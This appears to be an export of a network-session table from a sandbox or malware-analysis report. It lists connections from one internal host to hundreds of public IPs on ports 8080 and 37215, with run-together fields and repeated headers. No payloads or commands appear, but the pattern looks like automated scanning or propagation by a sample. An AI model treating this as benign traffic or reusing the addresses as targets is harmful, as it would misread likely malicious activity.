                                                        22448192.168.2.234055241.245.13.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22449192.168.2.234452052.224.112.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22450192.168.2.2334142180.130.228.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22451192.168.2.2338890201.29.234.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22452192.168.2.235918267.162.114.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22453192.168.2.234479270.22.137.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22454192.168.2.2358724164.216.74.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22455192.168.2.2358364122.47.86.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22456192.168.2.2355088104.63.218.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22457192.168.2.2352514204.31.157.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22458192.168.2.235033082.213.8.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22459192.168.2.23562168.114.223.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22460192.168.2.2345730117.152.214.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22461192.168.2.2359476101.148.181.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22462192.168.2.2346686151.152.110.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22463192.168.2.233785080.77.7.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22464192.168.2.2338140198.187.12.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22465192.168.2.235137820.136.29.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22466192.168.2.2340282118.26.250.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22467192.168.2.234049085.193.165.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22468192.168.2.2360750189.134.205.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22469192.168.2.233284024.194.178.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22470192.168.2.234809642.63.159.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22471192.168.2.2350824159.22.9.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22472192.168.2.233896270.225.215.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22473192.168.2.2349230129.177.144.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22474192.168.2.2352162158.101.153.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22475192.168.2.2335742117.137.196.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22476192.168.2.2347408199.200.57.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22477192.168.2.235781873.248.196.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22478192.168.2.235522632.113.215.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22479192.168.2.235204057.38.235.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22480192.168.2.233797827.2.151.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22481192.168.2.233322084.20.149.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22482192.168.2.233941065.146.174.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22483192.168.2.2340330204.125.82.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22484192.168.2.2345414159.5.30.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22485192.168.2.234800449.255.5.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22486192.168.2.2340602196.86.2.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22487192.168.2.2353572135.45.244.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22488192.168.2.2344986203.157.232.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22489192.168.2.233939212.105.62.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22490192.168.2.2354326115.224.190.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22491192.168.2.235910240.32.88.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22492192.168.2.2348976169.111.167.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22493192.168.2.2334606160.8.201.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22494192.168.2.2359334121.99.219.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22495192.168.2.2351360159.203.124.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22496192.168.2.233674865.231.196.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22497192.168.2.234205260.30.162.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22498192.168.2.234476486.176.20.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22499192.168.2.2346516208.163.76.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22500192.168.2.234700242.253.37.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22501192.168.2.235067079.100.249.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22502192.168.2.2356140210.21.27.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22503192.168.2.2354604167.13.183.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22504192.168.2.234306059.68.199.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22505192.168.2.23532989.130.10.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22506192.168.2.233672838.142.195.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22507192.168.2.2353930111.64.168.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22508192.168.2.2359198120.6.149.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22509192.168.2.234741293.233.73.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22510192.168.2.2336064135.108.25.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22511192.168.2.234288875.147.147.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22512192.168.2.2358808158.179.215.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22513192.168.2.233755048.237.186.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22514192.168.2.2347858124.88.122.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22515192.168.2.2341042155.238.70.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22516192.168.2.2357052107.38.186.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22517192.168.2.234426227.236.178.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22518192.168.2.2357218132.242.61.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22519192.168.2.234602088.158.182.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22520192.168.2.234190824.109.57.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22521192.168.2.2333622194.152.253.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22522192.168.2.233518019.89.91.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22523192.168.2.2356218167.54.99.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22524192.168.2.235955846.199.41.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22525192.168.2.233748461.127.115.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22526192.168.2.234420273.194.81.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22527192.168.2.2343222205.219.109.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22528192.168.2.234995290.152.128.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22529192.168.2.235389070.230.237.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22530192.168.2.2339638206.58.145.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22531192.168.2.2354018112.22.160.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22532192.168.2.2336616186.184.166.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22533192.168.2.235705247.6.199.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22534192.168.2.235123650.142.223.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22535192.168.2.235636681.250.212.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22536192.168.2.2343050102.186.142.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22537192.168.2.234203275.201.231.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22538192.168.2.2359900151.240.101.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22539192.168.2.235151840.6.70.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22540192.168.2.2359240203.196.250.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22541192.168.2.2338794164.242.158.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22542192.168.2.2339004136.69.242.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22543192.168.2.235317658.207.42.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22544192.168.2.235398890.36.158.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22545192.168.2.234567641.230.110.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22546192.168.2.233445276.95.91.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22547192.168.2.2357502197.11.93.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22548192.168.2.2344880197.126.241.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22549192.168.2.2341856123.48.216.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22550192.168.2.2342640157.117.47.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22551192.168.2.233767858.115.200.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22552192.168.2.2353090157.76.36.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22553192.168.2.2353836145.239.84.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22554192.168.2.236051641.247.183.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22555192.168.2.2340470157.108.206.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22556192.168.2.234886841.30.227.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22557192.168.2.2346512157.40.171.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22558192.168.2.235917861.166.189.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22559192.168.2.2355522157.107.175.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22560192.168.2.234164417.227.91.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22561192.168.2.2353894178.253.218.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22562192.168.2.234684058.121.183.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22563192.168.2.233872241.173.59.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22564192.168.2.2352392197.209.10.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22565192.168.2.2351258157.181.225.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22566192.168.2.2350874185.11.128.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22567192.168.2.2334180197.76.55.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22568192.168.2.2341678181.173.27.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22569192.168.2.233815441.154.150.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22570192.168.2.235285241.235.15.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22571192.168.2.2349640157.5.106.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22572192.168.2.2341476197.125.66.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22573192.168.2.2344750197.128.133.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22574192.168.2.2347240157.235.110.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22575192.168.2.2344972157.84.187.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22576192.168.2.2347416146.206.155.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22577192.168.2.2350798197.32.114.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22578192.168.2.2360056197.2.7.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22579192.168.2.235339241.20.185.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22580192.168.2.2358332104.215.40.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22581192.168.2.2354518197.123.48.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22582192.168.2.2335700197.192.219.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22583192.168.2.2335992197.177.188.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22584192.168.2.2333828197.185.63.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22585192.168.2.2347750197.13.197.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22586192.168.2.2333030197.191.230.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22587192.168.2.2351226197.217.61.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22588192.168.2.2339226197.47.67.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22589192.168.2.234899688.108.32.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22590192.168.2.2358834184.152.79.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22591192.168.2.2336734197.10.225.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22592192.168.2.2359694197.198.5.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22593192.168.2.2352590157.241.25.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22594192.168.2.235226041.73.89.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22595192.168.2.2348258197.241.51.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22596192.168.2.2357068175.185.155.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22597192.168.2.235589041.97.124.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22598192.168.2.2343750197.137.211.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22599192.168.2.2334434197.78.247.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22600192.168.2.236083241.191.119.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22601192.168.2.233662412.235.154.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22602192.168.2.2351398157.239.210.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22603192.168.2.235928241.148.59.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22604192.168.2.2340518197.133.4.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22605192.168.2.2332958125.28.43.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22606192.168.2.2342862153.192.126.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22607192.168.2.236077641.180.107.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22608192.168.2.2355376197.169.83.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22609192.168.2.2337606157.219.161.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22610192.168.2.2344570197.196.162.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22611192.168.2.234153487.220.122.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22612192.168.2.235643698.233.205.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22613192.168.2.234153241.92.20.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22614192.168.2.2347662157.165.161.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22615192.168.2.2339690197.212.2.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22616192.168.2.2338676202.188.0.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22617192.168.2.233574241.188.7.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22618192.168.2.2351822157.238.46.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22619192.168.2.2354662157.88.63.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22620192.168.2.2351940197.241.8.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22621192.168.2.2333592129.99.73.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22622192.168.2.2343252157.16.25.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22623192.168.2.2350050183.77.140.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22624192.168.2.2355404157.35.183.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22625192.168.2.234000041.170.135.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22626192.168.2.2348984208.250.81.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22627192.168.2.235929241.238.13.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22628192.168.2.2342832197.99.173.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22629192.168.2.2357160157.106.83.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22630192.168.2.2351728157.66.96.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22631192.168.2.235606641.29.122.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22632192.168.2.2358562197.49.118.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22633192.168.2.2354160197.14.13.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22634192.168.2.2352822157.85.10.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22635192.168.2.235876441.229.161.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22636192.168.2.2341928197.153.20.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22637192.168.2.233604841.194.254.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22638192.168.2.2335692180.196.242.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22639192.168.2.2348464197.236.183.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22640192.168.2.235607641.183.227.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22641192.168.2.233302641.175.138.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22642192.168.2.2339324197.156.178.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22643192.168.2.2356428152.85.160.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22644192.168.2.2351766157.146.88.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22645192.168.2.2353016197.166.24.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22646192.168.2.235055641.22.215.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22647192.168.2.23407765.19.77.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22648192.168.2.234119441.226.13.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22649192.168.2.2357290157.90.161.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22650192.168.2.233978041.65.162.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22651192.168.2.2348796197.140.115.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22652192.168.2.2349472157.19.158.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22653192.168.2.233894041.160.124.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22654192.168.2.235756841.240.55.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22655192.168.2.234718441.194.156.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22656192.168.2.2342550173.60.52.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22657192.168.2.2348600157.246.72.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
